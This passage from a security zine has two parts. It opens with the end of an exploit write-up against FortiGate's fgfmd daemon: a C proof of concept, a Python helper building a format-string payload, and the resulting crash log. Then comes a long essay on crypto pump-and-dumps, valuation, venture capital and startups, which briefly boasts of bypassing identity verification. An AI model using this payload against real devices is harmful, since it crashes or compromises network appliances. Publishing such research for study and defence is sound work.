#define KEYFILE "key.pem"
#define CERTFILE "cert.pem"
int main(){
    int sock;
    struct sockaddr_in sa={0};
    SSL_CTX *ctx;
    SSL *ssl;
    const SSL_METHOD *method;
    uint32_t len_be;
    char *fgfm_magic="\x36\xe0\x11\x00";
    method=TLS_server_method();
    ctx=SSL_CTX_new(method);
    SSL_CTX_use_certificate_file(ctx, CERTFILE, SSL_FILETYPE_PEM);
    SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    sa.sin_family=AF_INET;
    sa.sin_port=htons(PORT);
    sa.sin_addr.s_addr=inet_addr(HOST);
    connect(sock, &sa, sizeof(struct sockaddr));
    ssl=SSL_new(ctx);
    SSL_set_fd(ssl, sock);
    if(SSL_accept(ssl)<=0)
        ERR_print_errors_fp(stderr);
    else{
        len_be=htonl(strlen(payload)+1+8);
        SSL_write(ssl, fgfm_magic, 4);
        SSL_write(ssl, &len_be, 4);
        SSL_write(ssl, payload, strlen(payload)+1);
    }
    SSL_shutdown(ssl);
    SSL_free(ssl);
    close(sock);
    SSL_CTX_free(ctx);
}
Just change the HOST and provide a key.pem/cert.pem. The hardest part about
developing a crash POC was realizing the TCP client is acting as the TLS
server. The protocol itself is just a magic number, size field, and
text-based body.
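For reference, the same framing in a few lines of Python, mirroring the C
POC above (the helper name is made up):
--------------------------------------------------------------------------
import struct

MAGIC = b"\x36\xe0\x11\x00"    # fgfm magic, same as the C POC

# 4-byte magic, 4-byte big-endian total length (covering magic, length
# field and NUL-terminated body), then the body itself.
def fgfm_packet(body):
    body += b"\x00"
    return MAGIC + struct.pack(">I", len(body) + 8) + body

pkt = fgfm_packet(b"reply 200\r\nrequest=auth\r\n"
                  b"mgmtip=%270441$1$c%n%n%n%n%n%n%n%n%n%n\r\n\r\n")
--------------------------------------------------------------------------
On a vulnerable build, the crashlog tells the story: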
<23066> firmware FortiGate-VM64 v7.2.4,build1396b1396,230131 (GA.F)
(Release)
<23066> application fgfmsd
<23066> *** signal 11 (Segmentation fault) received ***
<23066> Register dump:
<23066> RAX: 00007f652c3d2040 RBX: 00007f652c8f7844
<23066> RCX: 00007ffd3fe86008 RDX: 00007f6531e7afc0
<23066> R08: 00007f652c3cf010 R09: 0000000000000000
<23066> R10: 0000000000000022 R11: 0000000000000246
<23066> R12: 00007ffd3fe83780 R13: 0000000000042069
<23066> R14: 000000000000000b R15: 0000000000000303
<23066> RSI: 00007ffd3fe84138 RDI: 00007ffd3fe86000
<23066> RBP: 00007ffd3fe83fe0 RSP: 00007ffd3fe83690
<23066> RIP: 00007f6531d65c6c EFLAGS: 0000000000010212
<23066> CS: 0033 FS: 0000 GS: 0000
<23066> Trap: 000000000000000e Error: 0000000000000004
<23066> OldMask: 0000000000000000
<23066> CR2: 00007ffd3fe86000
<23066> stack: 0x7ffd3fe83690 - 0x7ffd3fe854d0
<23066> Backtrace:
<23066> [0x7f6531d65c6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<23066> [0x7f6531d6805d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<23066> [0x7f6531d7b826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<23066> [0x7f6531d54d42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<23066> [0x00acc6aa] => /bin/fgfmd
<23066> [0x00acd30c] => /bin/fgfmd
<23066> [0x00acdcef] => /bin/fgfmd
<23066> [0x00aee12a] => /bin/fgfmd
<23066> [0x00ae8674] => /bin/fgfmd
<23066> [0x00ad60ba] => /bin/fgfmd
<23066> [0x00ae1d11] => /bin/fgfmd
<23066> [0x00449eaf] => /bin/fgfmd
<23066> [0x004531da] => /bin/fgfmd
<23066> [0x0044fd9c] => /bin/fgfmd
<23066> [0x00452428] => /bin/fgfmd
<23066> [0x00452d71] => /bin/fgfmd
<23066> [0x7f6531d24deb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<23066> [0x00444f1a] => /bin/fgfmd
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x11 of 0x11
|=-----------------------------------------------------------------------=|
|=-----------------------=[ Calling All Hackers ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ cts (@gf_256) ]=--------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
0 - Preamble
1 - About the Author
2 - The Birth of a Shitcoin
3 - How Money Works
3.1 - Fixed Income
3.2 - Equities
3.3 - Shareholder Value
4 - Startup Blues
5 - Takeaways
6 - Thanks
7 - References
8 - Appendix
--[ 0 - Preamble
Hi.
I'm cts, also known as gf_256, ephemeral, or a number of other handles.
I am a hacker and now a small business owner and CEO. In this article,
I would like to share my experience walking these two different paths.
A hacker is someone who understands how the world works. It's about
knowing what happens when you type "google.com" and press Enter. It's
about knowing how your computer turns on, about memory training, A20,
all of that. It's about modern processors, their caches, and their side
channels. It's about DSi bootloaders and how the right electromagnetic
faults can be used to jailbreak them. And it's about how Spotify and
Widevine and AES and SGX work so you can free your music from the
shackles of DRM.
But being a hacker is so much more than these things. It's about knowing
where to find things. Like libgen and Sci-Hub and nyaa. Or where to get
into the latest IDA Pro group buy. Or which trackers have what and how
to get into them.
It's about knowing how to bypass email verification. How to bypass SMS
verification. How to bypass that stupid fucking verification where you
hold your driver's license up to a webcam (thank you, OBS virtual camera!)
Having an actual threat model, not just paranoia. Knowing that you're not
worth burning a 0day on, but reading indictments to learn from others'
mistakes.
It's about knowing where to buy estradiol valerate on the internet and how
to compound injections. Or the "bodybuilder method" to order your own
blood tests when your state requires a script to do so. It's about knowing
which shipments give the US CBP a bad vibe and which don't.
It's about knowing what happens when you open Robinhood and giga long NVDA
FDs. I mean the actual market microstructure, not "Ken Griffin PFOF bad".
Then using that microstructure to find an infinite money glitch (high
Sharpe!). It's about knowing how to get extra passports and reading the
tax code.
It's about knowing how to negotiate your salary (or equity). It's about
knowing why things at the supermarket cost what they do. Or how that awful
shitcoin keeps pumping. And why that dogshit startup got assigned that
insane valuation. And understanding who really pays for it in the end
(hint: it's you).
My point is, it is not just about computers. It's about understanding how
the world works. The world is made up of people. As much as machines keep
society running, those machines are programmed by people--people with
managers, spouses, and children; with wants, needs, and dreams. And it is
about using that knowledge to bring about the change you want to see.
That is what being a hacker is all about.
--[ 1 - About the Author
I have been a hacker for 13 years. Prior to founding Zellic, I helped
start a CTF team called perfect blue (lately Blue Water). We later became
the number one ranked CTF team in the world. We've played in DEF CON CTF.
We've won GoogleCTF, PlaidCTF, and HITCON. It's like that scene from
Mr. Robot but not cringe.
In 2021, we decided to take that hacker friend circle and form a security
firm. It turned out that crypto paid well, so we worked with a lot of
crypto clients. In the process, we encountered insane, hilarious, and
depressingly sobering bullshit. In this article, I will tell some stories
about what that bullshit taught me, so you can benefit from the same
lessons as I have.
Markets are computers; they compute prices, valuations, and the allocation
of resources in our society. Hackers are good at computers. Let's learn
more about it.
--[ 2 - The Birth of a Shitcoin
I can't think of a better example than shitcoins. Let's look at the
crypto markets in action.
First, let's talk about tokens. What is their purpose? The purpose of a
token is to go up. There is no other purpose. Token go up. This is
important, remember this point.
Now the question is, how do we make the token go up? In crypto, there are
two main kinds of token deals. Let's call them the Asian Arrangement and
the Western Way.
The Asian Arrangement is a fairly straightforward pump and dump. It's a
rectangle between the VC, the Market Maker, the Crypto Exchange, and the
Token Project Founder.
1. The exchange's job is to list the token, bringing in investors. They
get paid in a mix of tokens and cold, hard cash. Their superpower is
owning the customer relationships with the retail users, and the
naming rights to sports arenas.
2. The market maker provides liquidity so the market looks really
healthy and well-traded so it is easy to buy the token. In good
deals, they are paid in in-the-money call options on the tokens,
so they are incentivized to help the token trade well. Their
superpower is having a lot of liquidity to deploy, and people
on PagerDuty.
3. The founder's job is to pump the token and shill it on Twitter.
They are the hype man, and it's their job to drum up the narrative
and pump everyone's bags. Their unique power is they can print more
tokens out of thin air, and this is in large part how they get paid
in this arrangement.
4. Lastly, the VC gets paid to organize the deal. They give the founders
some money, who in return give a pinky promise that they will give
the VC a lot of tokens once the tokens actually exist. This is known
as a Simple Agreement for Future Tokens, or SAFT. Their superpower is
dressing up the founders and project so it seems like the Next Big
Thing instead of a Ponzi scheme.
Everyone gets paid a ton of token exposure (directly or indirectly),
and when it lists, it pumps. Then the insiders dump and leave with a
fat stack. Except retail, they end up with the bag.
Sometimes the listing doesn't go well for the organizers, in which case,
better luck next time. But retail always loses.
wtf??? LFG!!! to the moon
,o \oXo/\o/
/v | | |
/\ / X\ / \
crypto investors
^ |
| |
| v
+----------+ provides liquidity +--------+
| Crypto | <--------------------------------------- | Market |
| Exchange | ----------------------------------------> | Maker |
+----------+ maker fees +--------+
^ | ^
fees, | | listing options |
tokens | | / fees |
| | +-------------------------------------------------+
| v |
+---------+ tokens / SAFT / token warrants +---------+
| Token | ---------------------------------------> | Venture |
| Project | <--------------------------------------- | Capital |
+---------+ cash , intros to CEX / MM, shilling +---------+
This machine worked exceptionally well in 2017, especially before China
banned crypto. All those ICO shitcoins? Asian Arrangement. And it still
works well to this day, except people are more wary of lockups and vesting
schedules and so on.
Now let's discuss the Western Way. The Asian Arrangement? That old pump
and dump? No sir, we are civilized people. Instead, our VCs *add value*
to their investments by telling the world "how disruptive the tech is"
and how the "team are incredible outliers". And they will not blatantly
PnD the token, but instead they will fund "projects in the ecosystem" so
it appears there is real activity happening on the platform.
This is to hype up metrics (like TPS or TVL) to inflate the next round
valuation. Anyways, then they dump. Or maybe the VC is also a market
maker so they market make their portfolio company tokens. Overall it's
the same shit (Ponzi) but dressed up in a nicer outfit.
Asian Arrangement or Western Way--either way, if you're the token founder,
your main priority is to just GO TO MARKET NOW and LAUNCH THE TOKEN. This
is so you can collect your sweet bag and dump some secondary before
someone else steals the narrative or the hype cycle moves on.
This is one of the reasons there are so many hacks in crypto. The code is
all shitty because it's rushed out as fast as possible by 20-something-
year-old software engineers formerly writing Typescript and Golang at
Google. Pair that with some psycho CEO product manager. Remember, it is
not about WRITING SECURE CODE, it is about SHIPPING THE FUCKING PRODUCT.
Good luck rewriting it in Rust!
All of this worked well until Luna, then 3AC, Genesis, and FTX imploded in
2022. It still works, but you have to be less blatant now.
Shitcoins do serve an essential need. They are an answer to financial
nihilism. Many people are working dead-end wage slave jobs that are not
enough to "make it". They feel trapped and forced to work at jobs they
fucking hate and waste their life doing pointless shit to generate
shareholder value. This kind of life feels unacceptable, yet there are
few avenues out. So what is the only "attainable" solution left? Gamble
it on shitcoins, and if you lose...maybe next paycheck will be better.
But enough about crypto, let's talk about securities.
--[ 3 - How Money Works
----[ 3.1 - Fixed Income
First, let's start with fixed income. I'm talking boring, old-fashioned
bonds, like Treasury bonds. A lot of people are introduced nowadays to
finance through equities (stocks) and tokens. In my opinion, this is
only half of the story. Fixed income is the bedrock of finance. It has
fundamental value. It provides a prototypical asset that all assets can
be benchmarked based on.
Fixed income assets, like bonds, boil down to borrowing and lending. A
bond is basically an IOU for someone to pay you in the future. It is more
useful to have a dollar today than in a year, so lenders charge a fee for
access to money today. This fee is known as interest, and how it is baked
into the equation varies from asset-to-asset. Some bonds come with
interest payments, whereas other bonds are zero-coupon. The most important
thing is to remember that bonds are essentially an IOU to pay $X in the
future.
Here is an example. Let's say you would like to borrow $100 to finance an
upcoming project. The interest rate will be 5% per year. To borrow money,
you would issue (mint) a bond (an IOU) for $105 to be repaid 1 year in the
future. In exchange for this fresh IOU, the lender will give you $100 now.
On the lender's balance sheet, they will be down $100 worth of cash, but
will also have gained $105 worth of an asset (your IOU), creating $5 of
equity. In contrast, you would have $100 more cash in assets, but also a
$105 liability, creating -$5 of equity.
This example also works for depositing money at a bank. Here, you are the
lender, and the bank is the borrower. Your deposits would be liabilities
on their balance sheet, as they are liable to pay you back the deposit if
you choose to withdraw it.
Lender's Balance Sheet           Borrower's Balance Sheet
===========================      ===========================
Assets:                          Assets:
  IOU-----------------105          Cash------------------100
Liabilities:                     Liabilities:
  Cash----------------(100)        IOU-------------------105
Equity:                          Equity:
  Equity----------------5          Equity----------------(5)
Fixed income assets are extremely simple. There are various risks (credit
risk, interest rate risk, etc.), but excluding these factors, you
essentially get what you pay for. Unlike a token or stock, the bond is not
going to suddenly evaporate or crash. (In theory.) Because of this, they
can be modeled in a straightforward way; a way so straightforward even
a high school student can understand it.
Let's say I have $X today. Suppose the prevailing (risk-free) interest
rate is 5%. What is the value of this $X in a year? Obviously, it would be
no less than $X*1.05, as I can just lend it out for 5% interest and get
$X*1.05 back in a year. If you gave me the opportunity to invest in any
asset yielding less than 5%, this would be a bad deal for me, since I
could just lend it out myself to get 5% yield.
Now, let's analyze the same scenario, but in reverse. Let's take that IOU
from earlier. What is the value *today* of a (risk-free) $X IOU, due in 1
year? It would be worth no more than $X/1.05. This is because with $X/1.05
dollars today, I could lend it out and collect 5% interest to end up with
$X again in the future. If I pay more than $X/1.05, I am getting a bad
deal, since I am locking up my money with you when it would be more
capital efficient to just lend it out myself.
You can probably see where I am going with this. The present value of an
$X IOU at some time *t* in the future is $X/(1+r)^t, where *r* is the
discount rate. The discount rate describes the "decay" of the value over
time, due to interest but also factors like potential failure of the asset
(for example, if the asset is a company, business failure of the company).
Now, if we have some asset which pays a series of future cash flows
*f(t)*, we can model this asset as a bundle of IOUs with values f(t) due
in time 1, 2, 3, and so on. Then the present value of this asset is the
geometric series sum of the discounted future cash flows. This is called
discounted cash flows (DCF). Congrats, now you can do better modeling than
what goes into many early-stage venture deals.
+------+-----+-----+---------+---------+---------+-------+---------+
| Year | 0 | 1 | 2 | 3 | 4 | ... | t |
+------+-----+-----+---------+---------+---------+-------+---------+
| Cash | CF1 | CF2 | CF3 | CF4 | CF5 | ... | CF_t |
| Flow | | | | | | | |
+------+-----+-----+---------+---------+---------+-------+---------+
| Disc.| CF1 |_CF2_| __CF3__ | __CF4__ | __CF5__ | ... | _CF_t__ |
| Val | | 1+r | (1+r)^2 | (1+r)^3 | (1+r)^4 | | (1+r)^t |
+------+-----------+---------+---------+---------+-------+---------+
IOU 1 IOU 2 IOU 3 IOU 4 IOU 5 ... IOU n
          inf
          ___
          \     f(t)
    DCF =  >   -------   (assume constant annual cash flow x)
          /__  (1+r)^t
          t=0

        =  x / (1 - 1/(1+r))  =  (1/r + 1) x

    Cash flow multiple = (value) / (annual cash flow) ~= 1/r
(The astute reader might also find that they can go backwards from
valuations to estimate first, second, ... Nth derivatives of the cash
flow or the year-to-year survival chances of a company. And these can be
compared with...going outside and touching grass to see if the valuation
actually makes sense.)
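If you prefer code to sigma notation, the whole model fits in a few lines
of Python (a toy with made-up numbers, not investment advice):
--------------------------------------------------------------------------
# Present value of a stream of future cash flows, discounted at rate r.
def present_value(cash_flows, r):
    return sum(cf / (1 + r) ** t for t, cf in enumerate(cash_flows))

r = 0.05
flows = [100] * 1000                  # ~perpetual $100/year, from t=0
print(round(present_value(flows, r))) # 2100
print((1 / r + 1) * 100)              # closed form (1/r + 1) x = 2100.0
--------------------------------------------------------------------------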
At this point, you're probably wondering why I'm boring you with all of
this dry quant finance 101 shit. Well, it's a useful thing to know about
how the world works.
First, interest rates affect you directly and personally. You may have
heard of the term "zero interest rate environment". In a low interest rate
environment, cash flow becomes irrelevant. Why? Consider the DCF geometric
series sum if the interest rate r = 0. The present value approaches
infinity. If the benchmark hurdle rate we're trying to beat is 0%,
literally ANYTHING is a better investment than holding onto cash.
Now do you see why VCs were slamming hundreds of millions into blatantly
bad deals and shit companies during Covid? Cash flow and profitability
didn't matter, because you could simply borrow more money from the money
printer.
Here's a more concrete example. Do you remember a few years ago when Uber
rides were so cheap, that they were clearly losing money on each ride?
This is known as Customer Acquisition Cost, or CAC. CAC is basically the
company paying you to use their app, go to their store, subscribe to the
thing, ... whatever. The strategy is well-known: burn money to acquire
users until everyone else dies and you become a monopoly. Then raise the
prices.
But here is the key point: this only works in a low-interest rate
environment. In such an environment, discounting is low, and thus, future
growth potential is valued over profitability and fundamentals at present.
It doesn't need to make sense *today* as long as it works 10 years from
now. For now, we can keep borrowing more money to sustain the burn.
Of course, when rates go back up, the free money machine turns off and
the effects ripple outward. You are the humble CAC farmer, farming CAC
from various unprofitable consumer apps like ride share, food delivery,
whatever. These apps raise their money from their investors, VC and
growth equity funds. These funds in turn raise their money from *their*
investors, their limited partners. These LPs might be institutional
capital like pension funds, sovereign wealth funds, or family offices.
At the end of the day, all of that wealth is generated somewhere
throughout the economy by ordinary people. So when some VC-backed
founders throw an extravagant party on a boat with fundraised dollars,
in some sense, you are the one paying for it.
And when the money machine turns off, anyone who had gotten complacent
under ZIRP is now left scrambling. Companies will overhire during ZIRP
only to do layoffs when rates go up.
+=========================+
| THE LIQUIDITY CYCLE |
+=========================+
VENTURE CAPITAL
_______________ ,.-^=^=^=^=^=^=^=^=^=^;,
,;===============>> E^ a16z LSVP Tiger '^3.
.;^ E^ FF Social Cap. '^3
// condensation .E Bain SoftBank Accel 3^
/|^ ^E KP Benchmark :^
|| ^;: YC Greylock GC ;3'
,.^-^-^-^-^-^-^-^-^-^-^;, ^.=.=_=_=_=_=_=_=_=_=_=_=^
E^ endowments family '^:. \\\\\\\\\\\\\\\\\\\\
E^ offices '^3 \\\\\\\\\\\\\\\\\\\\
E' pension ^3. SOURCE \\\ precipitation \\
^; funds sovereign 3.' CAPITAL \\\\\\\\\\\\\\\\\\\\
E;: wealth funds ,3^ (LPs) \\\\\\\\\\\\\\\\\\\\
^;._.._._._._._._._._._._,^ \\\\\\\\\\\\\\\\\\\\
/\
^ ^ ^ ^ ^ ^ ^ ^ gamefi /\ /\ uber eats
| | | | | | | | shitcoins/::\/::\ /::::\ /\
| evaporation | / doordash/^^^^^^\ /^^\
| | | | | | | | ____________ / \ / hello \
(poggers desu) /_____ lime ____ fresh ___\
\o/ \oXo/\oXoXo/ o '==========' UNPROFITABLE CONSUMER APPS
| | | | | | /|\ Oo._ /\_/\ ,///
__/_\_/_X_\/_X_X_\_/_\__ /_________(@'w'@)_____________.,://'
SOCIETY \'''''''' -...-''''''''''''''''' surface
THE HUMBLE runoff
CAC FARMER
Second, credit is not inherently a bad thing if used responsibly. Take for
example those Buy Now, Pay Later loans. Now that you are equipped with the
concept of capital efficiency, wouldn't it technically be better to take
an interest-free BNPL loan and temporarily stick the freed cash into an
investment, rather than paying cash up front? (Barring other side effects,
etc.)
Third, the concept of net present value--i.e., credit--is the killer app
of finance. It allows you to transport value from the future into today.
Of course, that debt must be repaid in the future, unless you can figure
out a way to kick the can down the road forever.
For now, let's get back to stocks.
----[ 3.2 - Equities
Now we have seen both sides of the coin. Asset value is twofold:
speculative and fundamental.
First, we saw speculative value as illustrated by crypto meme coins. Then,
on the other hand, we examined fundamental value as illustrated by, e.g. a
US Treasury. These two lie on two extremes of a spectrum. Some sectors and
stocks are more speculative than others; Nvidia is practically a meme coin
at this point, whereas something like Coca-Cola is like fixed income for
boomers (NFA BTW). Most assets have a blend of both.
Thinking about stocks, they (usually) have some fundamental value.
Equities represent ownership of some asset, like a business. The business
in theory generates dividends for shareholders, and this cash flow (or the
net present value of future ones) represents the fundamental value of the
business. As we've seen, assets with better cash flows are more valuable.
In practice, buybacks can be used to create what is effectively a
shareholder dividend in a more tax-advantaged way. Dividends are taxed as
income, and the tax is realized immediately. Buybacks are taxed as
capital gains, but crucially the gains are not realized
until the asset is sold. This could be indefinitely far in the future, so
it's more capital efficient. It has the added benefit that it helps pump
the token, and imo this is kind of cute because it marries both the
fundamental and speculative aspects.
Meanwhile, like tokens, stocks are also supposed to go up. Here's an
example: imagine a generic meme coin. Apart from Go Up, what does it do?
Nothing. Even if it's a Governance Token, who cares when the founders and
VCs hold all the voting power? Anyways, I'm describing Airbnb Class A
Common Stock. Here's an excerpt from their S-1 [1] [2]:
> We have four series of common stock, Class A, Class B, Class C, and
> Class H common stock (collectively, our "common stock"). The rights of
> holders of Class A, Class B, Class C, and Class H common stock are
> identical, except voting and conversion rights ... Each share of Class A
> common stock is entitled to one vote, each share of Class B common stock
> is entitled to 20 votes and is convertible at any time into one share of
> Class A common stock ... Holders of our outstanding shares of Class B
> common stock will beneficially own 81.7% of our outstanding capital
> stock and represent 99.0% of the voting power of our outstanding capital
> stock immediately following this offering, ...
Name of | Class B | % | % of Vot-
Beneficial Owner | Shares | | ing Power
-------------------------------------+------------+-------+-----------
Brian Chesky | 76,407,686 | 29.1% | 27.1%
Nathan Blecharczyk | 64,646,713 | 25.3% | 23.5%
Joseph Gebbia | 58,023,452 | 22.9% | 21.4%
Entities Affil. w/ Sequoia Capital | 51,505,045 | 20.3% | 18.9%
Why do people buy tech stocks with inflated valuations? Some buy because
they believe that they will go up, that they will be more dominant,
important, and valuable in the future. Like tokens, a large part of
stocks' value is speculative. They are expressing their opinion on the
future fundamentals. Others buy simply because they believe others will
believe that it is more valuable. That is an opinion not about
fundamentals but about *pumpamentals*.
Importantly, unlike fundamental value, speculative value can be created
out of thin air. It is minted by *fiat*. Fundamental value is difficult
to create, whereas speculative value can be created through hype and
psychology alone.
----[ 3.3 - Shareholder Value
For stocks, there are usually laws in place to protect investors, pushing
the balance between "speculation" and "fundamentals" towards the latter.
As a result, firms are generally legally obligated to act in their
shareholders' best interests. This is good because normal people will be
able to participate in the wealth generated by companies. And obviously,
companies should not defraud their investors.
However, the biggest *stake* holders in a business are usually (in order):
1. The employees. No matter what, no one else is spending 8 hours a day,
or ~33% of their total waking lifespan at this place. Whatever it is,
I guarantee you the employees feel it the most.
2. The customers. The customers are the reason the business is able to
exist in the first place. Non-profits are not exempt: their customers
are their donors.
3. The local community / local environment / ecosystem. The business
doesn't exist in a vacuum. The business has externalities, and those
externalities affect most the immediate surrounding environment.
4. And in last place, the shareholders. They do not really do anything
except contribute capital and hold the stock. Of course capital is
important but they are not spending 8 hours a day here, they are not
the reason the business exists, and in fact they might even live in a
totally different country.
For large, publicly-listed companies, the shareholders have one more
unique difference from the other three stakeholders: liquidity. This
difference is critical.
Liquidity describes how easy it is to buy and sell an asset. A dollar
bill is liquid. Bitcoin is liquid. A house is relatively illiquid. Stock
in large, publicly-listed companies is also liquid. A shareholder can buy
a stock one day and sell it the next. As a result, the relationship is
non-committal and opens the opportunity for short-term thinking.
There are many things a company could do which would benefit shareholders
short term, while harming the other three stakeholders long term. While a
shareholder can simply dump their position and leave, the mess created is
left for the employees, customers, and community to clean up.
(The SPAC boom was a pretty good example of this. Not all SPACs are bad,
but a lot of pretty shit businesses publicly listed through SPACs then
crashed. This is sad to me because some of that is early investors and
founders dumping on retail like a crypto shitcoin, but dressed up because
it's NYSE or NASDAQ. Get liquidity then bail.)
Now, it is a misconception that stock companies must solely paperclip-
maximize short-term shareholder value. However, this is how it often
plays out due to fucked up shit in the public markets, like annoying
activist hedge funds or executive compensation tied to stock price. And
it is true that employees can be shareholders. And that is usually a good
thing! But few public companies are truly employee-owned.
Thinking about it from this perspective, the concept of maximizing
shareholder value seems somewhat backwards. But *why* would one make
this system where the priorities are seemingly inverted?
One benefit is that it would make your currency extremely valuable.
Suppose you want to do some shit on Ethereum (speculating on some animal
token?), you will need to have native ETH to do that transaction.
Similarly, if you want to invest in US securities you at some point need
US Dollars. If you want to get a piece of that sweet $NVDA action, you
need dollars. People want to buy American stocks. American companies
perform well: they're innovative; they're not too heavily regulated;
it's a business friendly environment. (Shareholder value comes first!)
The numbers go up.
Remember the token founder from earlier in the Asian Arrangement? Suppose
you are a *country* in the situation above, with a valuable currency. Not
only is your currency in demand and valuable, you are the issuing/minting
authority for that token. Similar to the token founder, you can print
valuable money and pay for things with it.
And speaking of being a founder, let's talk about that!
--[ 4 - Startup Blues
Based on what we've set up so far, I will discuss some of the problems I
see with many startups today and with startup culture.
Many of the problems stem from misalignment between shareholders and the
other stakeholders (employees, etc). A lot of this comes from the
fundamentals of venture capital. VC is itself an asset class, like fixed
income and equities. VCs pitch this to their limited partners, at some
level, based on the premise that their VC fund will generate yield for
them. The strategy is to identify stuff that will become huge and buy it
while it's still small and really cheap. Like trading shitcoins, it's
about finding what's going to moon and getting in early.
In a typical VC fund, a small handful of the investments will comprise the
entire returns of the fund, with all of the other investments being 0's.
The distribution is very power law. This means we are not looking for 1x,
2x, or 3x outcomes; these may even be seen as failure modes. We are only
interested in 20x, 50x, 100x, etc. outcomes. This is because anything
less will be insufficient to make up for all the bad investments that
get written down to zero.
For the same reason, it only makes sense for VCs to invest in certain
types of companies. Have you ever heard this one? "We invest in SOFTWARE
companies!...How is this SCALABLE? What do the VENTURE SCALE OUTCOMES look
like here?" This is because these kinds of companies are the ones with the
potential to 100x. They want you to deliver a 100x. Or how about this one?
"We invest in CATEGORY-DEFINING companies". At least in security,
"category-defining" means a shiny new checkbox in the compliance / cyber
insurance questionnaire. In other words, a new kind of product that people
MUST purchase.
The market is incentivized to deliver a product that meets the minimum bar
to meet that checkbox, while being useless. I invite you to think of your
favorite middleware or EDR vendors here. For passionate security founders
considering raising venture, remember that this is what your "success" is
being benchmarked against.
_.,------------------------------_
.%' '&.
.;' We partner with founders ^;
! building category-defining ;!
; companies at the earliest stages _;
^; _.^
''-.______________ __________.-'
/ /
/ /^
/ /^
/;^
/'
_________ _________
_-' '. _-' '.
,^ '^_ ,^ '^_
/' '"' /' '"'
^' ^\^ ^' ^\^
: ^| : ^|
: . . |) : . . |)
: \ |) : \ |)
: __\ ,; : __\ ,;
" ! ; " ! ;
" ^\ _____ /' " ^\ _____ /'
'| | ^\ _/^ '| | ^\ _/^
| ^'=====' | ^'====='
| . | | | . | |
_' |^__ _' |^__
---------_-' U '--_ -------------_-' U '--_ -----
._ _.-' '-._ _.-' '-
':.' \ ; / ': .' \ ; / [4]
It's due to the thirst for 100x that there are painful dynamics. A
fledgling startup may have founders they really like, but the current
business may be unscalable. Bad VCs will push founders towards strategies,
bets, models that have a 1% chance of working, but pay out 200x if they
do.
In the process they destroy a good business--one which has earned the
trust of dutiful employees and loyal customers--all for a lottery ticket
to build a unicorn. They will throw 100 darts at the dartboard and maybe 5
will land, but what is it like to be the dart? You may have good expected
value, but all of that EV is from spikes super far away from the origin.
Is it pleasant betting everything on this distribution?
VCs want founders to be cult leaders. Have you ever heard this line? "We
invest in great storytellers." Like what we saw with stocks and tokens,
much of the easily-unlockable potential upside in assets is speculative.
In essence, value can be created through narrative. Narrative *IS* value.
Bad VCs will push founders to raise more capital at ever higher
valuations (higher val = markup = fees), using narrative as fuel for the
fire. Storytelling means "pump the token", and the job of the CEO is to
(1) be the hype man and to raise (2) cash and (3) eyeballs. For this
reason, Sam Altman and Elon are fine CEOs, regardless of other factors,
because they are great at all three.
Much to the detriment of founders' and their employees' psyche, investors
expect founders to be this legendary hype man. This requires a religiosity
of belief that is borderline delusional. Have you ever tried to convince
one of those Silicon Valley YC-type founder/CEOs that they are wrong? They
will never listen to you because they have been socialized to be this way.
It is what is expected of them, and it is easy to fall into this trap
without even becoming aware of it. But if you think about it, does it make
sense that to be a business owner, you need to be a religious leader? Of
course not.
All of these reasons are why so many startup founders are young. They have
little to lose, so gambling it all is OK. Being a cult leader may be
traumatizing, but they have time (and the neuroplasticity) to heal. And
lastly, they do not have the life experience to have a mature personal
identity beyond "I am a startup founder". All of this makes it easy to
accept the external pressures to build a company this or that way, and
perhaps not the way they would have wanted to had they relied on their
personal values. The true irony is that the latter is what creates true,
enduring company culture and not the made-up Mad Libs-tier Company Culture
Notion Page shit that so many startups have. And of course, good VCs are
self-aware of all of the issues and strive to prevent them. But the
overall problem remains.
One last externality is for communities based around an industry. When you
add billions of venture dollars into an industry, it becomes cringe.
It's saddening to me seeing the state of certain cybersecurity conferences
which are now dominated by..."COME TO OUR BOOTH, YOU CAN BE A HACKER.
PLEASE VIEW OUR AI GENERATED GRAPHICS OF FIGURES CLAD IN DARK HOODIES
STATIONED BEHIND LAPTOPS". Here I would use the pensive emoji U+1F614
to describe my feelings about the appropriation of hacker culture but
Phrack is 7-bit ASCII, so please have this: :c u_u . _.
--[ 5 - Takeaways
The point is, all of this made me feel very small and powerless after I
realized the sheer size of the problems I was staring at. Nowadays, to
me it's about creating good jobs for my friends, helping our customers,
and taking care of the community. Importantly, I realized that this is
still making a bigger positive impact than what I could have done alone
just as an individual hacker or engineer.
To me, businesses are economic machines that can create positive (or
negative) impact in a consistent, self-sustaining way. There are many
people who are talented, kind, and thoughtful but temporarily unlucky.
Having a company let me help these friends monetize their abilities and be
rewarded fairly for them. And in that way I helped make their life better.
Despite a lot of the BS involved in running a business, this is one thing
that is very meaningful to me.
You can understand computers and science and math as much as you want, but
you will not be able to fix the bigger issues by yourself. The systems
that run the world are much bigger than what we can break on our laptops
and lab benches.
But like those familiar systems, if we want to change things for the
better, we have to first understand those systems. Knowledge is power.
Understanding is the first step towards change. If you do not like the
system as it is, then it is your duty to help fix it.
Do not swallow blackpills. It's easy to get really cynical and think
things are doomed (to AGI apocalypse, to environmental disaster, to
techno/autocratic dystopia, whatever). I want to see a world where
thoughtful hackers learn these systems and teach each other about them.
That generation of hackers will wield that apparatus, NOT THE OTHER WAY
AROUND.
Creating leverage for yourself. Hackers should not think of themselves as
"oh I am this little guy fighting Big Corporation" or whatever. This is
low agency behavior. Instead become the corporation and RUN IT THE WAY YOU
THINK IT SHOULD BE RUN. Keep it private and closely held, so no one can
fuck it up. Closely train up successors, so in your absence it will
continue to be run in a highly principled way that is aligned with your
values and morals. Give employees ownership, as it makes everyone aligned
with the machine's long-term success, not just you.
Raising capital. Many things do really need capital, but raise in a
responsible way that leaves you breathing room and the freedom to operate
in ways that are aligned with your values. Never compromise your values or
integrity. Stay laser focused on cash flows and sustainability, as these
